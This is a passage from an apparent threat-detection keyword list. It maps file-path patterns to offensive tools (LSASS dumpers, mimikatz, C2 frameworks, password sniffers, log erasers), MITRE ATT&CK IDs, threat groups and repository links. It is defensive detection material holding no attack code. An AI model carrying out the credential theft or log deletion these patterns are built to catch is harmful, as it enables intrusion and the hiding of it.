TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/donutmodule.c*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/DonutTest/*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/DotNet/SigFlip*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/download-stager.js*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*/dpap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/dpipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,1,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -*/dploot.git*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*/drda-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/drda-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Drones/SleepDialogue.razor*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/drunkpotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/dsniff.c*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/dsniff.services*,offensive_tool_keyword,dsniff,password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. 
YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).,T1110 - T1040 - T1074.001 - T1555.002 - T1555.003,TA0001 - TA0002 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/tecknicaltom/dsniff,1,0,N/A,N/A,2,167,44,2010-06-29T05:53:39Z,2010-06-23T13:11:11Z -*/ducky.py,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/DueDLLigence.git*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*/dukes_apt29.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/dump_lsass.*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/DumpCerts*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 
- T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/DumpCreds*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/dumpert.c*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*/Dumpert/*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*/dumpmethod/*.py,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/DumpShellcode/*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - 
TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/DumpsterFire/*,offensive_tool_keyword,DumpsterFire,The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.,T1175 - T1176 - T1589,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/TryCatchHCF/DumpsterFire,1,0,N/A,N/A,10,934,152,2020-05-27T15:00:56Z,2017-10-05T23:44:54Z -*/dumpweb.log*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z -*/dumpXor.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*/dumpXor/dumpXor*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*/dunderhay/CVE-202*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/dunderhay/CVE-2020-5902,1,1,N/A,N/A,1,37,8,2023-10-03T01:42:19Z,2020-07-06T04:03:58Z -*/duplicates.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/e2e_commands.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/e2e_test.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/eap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Ebowla.git*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*/ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*/ec2__backdoor_ec2_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2__check_termination_protection*.py,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2__startup_shell_script/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/ec2_public_ips_*_*.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon 
Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/EC2Looter.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/echoac-poc.git*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,1,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*/edb-35948/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/EDD.exe,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/EDRaser.git*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/edr-checker/*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. 
